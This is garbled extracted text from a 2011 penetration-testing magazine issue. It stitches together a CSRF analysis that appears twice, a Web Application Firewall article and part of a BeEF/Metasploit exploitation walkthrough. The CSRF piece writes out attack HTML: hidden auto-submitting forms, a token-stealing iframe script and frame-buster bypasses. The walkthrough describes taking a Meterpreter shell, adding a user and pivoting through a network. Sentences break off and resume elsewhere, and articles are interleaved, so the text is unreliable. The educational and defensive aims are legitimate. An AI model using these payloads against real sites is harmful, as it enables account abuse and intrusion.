The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1 HTML code used to bypass protection
<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame"
        method="POST">
    <input type="text" name="message" value="I like www.evil.com" />
    <input type="submit" />
  </form>
  <script>document.Form.submit()</script>
</div>
index.php (Victim website)
And here is the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
  if (top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, to compare them after the form submission.
Subverting one-time tokens is usually accomplished by brute-force attacks. Brute-force attacks against one-time tokens are useful only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
  $token = md5(uniqid(rand(), TRUE));
  $_SESSION['token'] = $token;
?>
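For comparison, the same one-time token scheme can be sketched in Python; note that `md5(uniqid(rand(), true))` derives from the clock and a weak PRNG, which can narrow a brute-force search, so this sketch uses a cryptographically strong token source and a constant-time comparison (the function names and the `session` dict are illustrative, not part of the article's code):

```python
import hmac
import secrets

# Illustrative stand-in for the server-side session store.
session = {}

def issue_token() -> str:
    # Unpredictable token, placed in the form's hidden field...
    token = secrets.token_hex(16)
    # ...and stored in the session at the same time, as described above.
    session["token"] = token
    return token

def check_token(submitted: str) -> bool:
    # compare_digest avoids leaking match information through timing.
    return hmac.compare_digest(session.get("token", ""), submitted)

t = issue_token()
assert check_token(t)
assert not check_token("guess")
```

The flow mirrors Listings 2 and 3: one function plays the role of index.php (issue and store), the other plays post.php (compare before accepting the message).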
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2 Wrong token
<?php session_start(); ?>
<html>
<head>
  <title>GOOD.COM</title>
</head>
<body>
<?php
  $token = md5(uniqid(rand(), true));
  $_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
  <input type="text" name="message">
  <input type="submit" value="Post">
  <input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3 Correct token
<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
  $message = $_POST['message'];
  echo "<b>Message</b><br>$message";
  $file = fopen("messages.txt", "a");
  fwrite($file, $message."\r\n");
  fclose($file);
} else {
  echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
  window.onbeforeunload = function() {
    return "Do you want to leave this page?";
  }
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:
<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
  if (self == top) {
    document.documentElement.style.display = 'block';
  } else {
    top.location = self.location;
  }
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level, and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4: Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post" />
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38 • http://pentestmag.com • 01/2011 (1) November
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as our working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without the developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications – one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for making action anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have recently started to combine the methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch the weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that until now did not process its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not just use the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in. This makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether, and to what extent, the problems must be resolved, or if further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered over time, and by this time correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or as an important business process. Despite this, the demand for good code programming that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.

A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.

Secure programming and WAFs are not contradictory but actually complement each other. Analogous to flight traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF, it is still recommendable to check the security functions, as conducted by penetration testers. This might reveal, for example, that the system can be misused by SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about the parameter quality, such as their maximum length, valid characters and permitted value range.
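Such general parameter rules can be pictured as a simple validation pass over each request. A hedged sketch in JavaScript (the field names, limits and character classes are invented for illustration):

```javascript
// Illustrative WAF-style parameter rules: expected parameter count,
// maximum length, and permitted characters per field.
const formRules = {
  maxParams: 2,
  fields: {
    user:    { maxLen: 32,  allowed: /^[A-Za-z0-9_]+$/ },
    comment: { maxLen: 200, allowed: /^[\w\s.,!?-]*$/ },
  },
};

function checkRequestParams(params, rules) {
  const names = Object.keys(params);
  if (names.length > rules.maxParams) return false; // e.g. 3+ params blocked
  return names.every((name) => {
    const rule = rules.fields[name];
    if (!rule) return false;                        // unknown parameter
    const value = String(params[name]);
    return value.length <= rule.maxLen && rule.allowed.test(value);
  });
}
```

With such rules, a request smuggling in a third parameter, or a quote character in a field restricted to alphanumerics, is rejected before it ever reaches the application.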
Of course, an integrated XML firewall should also be standard these days, because increasingly more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. However, in practice a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use by employing templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
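The combined approach described above can be sketched as a two-stage check: a blacklist of known-bad signatures applied to every request, plus a whitelist profile for a high-value page. All patterns, paths and parameter names below are invented for illustration:

```javascript
// Stage 1: blacklist of known-bad signatures, applied to every request.
const blacklist = [/<script/i, /union\s+select/i, /\.\.\//];

// Stage 2: whitelist profile for a high-value page: only these
// parameters, matching these shapes, are acceptable.
const orderEntryWhitelist = {
  item: /^[0-9]{1,6}$/,
  qty:  /^[0-9]{1,3}$/,
};

function allowRequest(path, params) {
  const values = Object.values(params).map(String);
  // Negative security profile: reject anything matching a bad signature.
  if (values.some((v) => blacklist.some((sig) => sig.test(v)))) return false;
  // Positive security profile for the high-value sub-section only.
  if (path === '/order') {
    return Object.keys(params).every((n) =>
      orderEntryWhitelist[n] && orderEntryWhitelist[n].test(String(params[n])));
  }
  return true; // other pages: blacklist-only
}
```

The design choice mirrors the text: the cheap-to-maintain blacklist covers the whole site, while the strict whitelist is confined to the one page where false negatives would hurt most.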
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that are in possible violation of the policies but can still be categorized as legitimate, based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. And only here are special functions available: as a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and Cookie Security prevents identity theft. But the Proxy WAFs must also be configured to correspond with the respective terms. Penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:

• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there a simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.

Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since by its very nature a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or their use of the web application; all other privileges are blocked. A general integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then this in practice makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products – or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers in creating sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
- Cover
- Editor's Note
- Contents
- The Significance of HTTP and the Web for Advanced Persistent Threats
- Web Application Security and Penetration Testing
- Developers are from Venus, Application Security Guys from Mars
- Pulling the Legs of Arachni
- XSS, BeEF, Metasploit Exploitation
- Cross-site Request Forgery: In-Depth Analysis • CYBER GATES • 2011
- First the Security Gate, then the Airplane: What Needs to be Heeded When Checking Web Applications
WEB APP VULNERABILITIES
Now, first ensure that the Zombie is still connected. Then click on Standard modules – Browser Exploit, and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).

Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).

If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).

Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).

The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.

Once we have control over this machine, we can use FTP or HTTP to download various other tools like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS prevention cheat sheet is a good guide for the same.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
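The encoding step in the second point can be sketched as a small HTML-entity encoder applied to any reflected value. This is a minimal illustration of the idea, not a substitute for a vetted encoding library such as the one the OWASP cheat sheet recommends:

```javascript
// Encode the characters that matter most for HTML element content,
// so user input is displayed as text rather than interpreted as markup.
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must run first, before entities are added
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}
```

Applied to a reflected parameter, an injected `<script>` tag comes out as inert text in the page instead of executing.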
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user input, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: it is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
style="display:none">

Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:

• Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1: HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit()</script>
</div>
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
Browser settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, to compare them after the form is submitted.
Subverting one-time tokens is usually attempted by brute-force attacks. Brute forcing one-time tokens is worthwhile for attackers only if the token mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To better understand how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token
<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1.

<script>
window.onbeforeunload = function() {
  return "Do you want to leave this page?";
};
</script>
<iframe src="http://www.good.com"></iframe>
Method 2. Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
  document.documentElement.style.display = 'block';
} else {
  top.location = self.location;
}
</script>
This protects the web application even if an attacker opens the webpage in a browser with JavaScript disabled.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. He then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
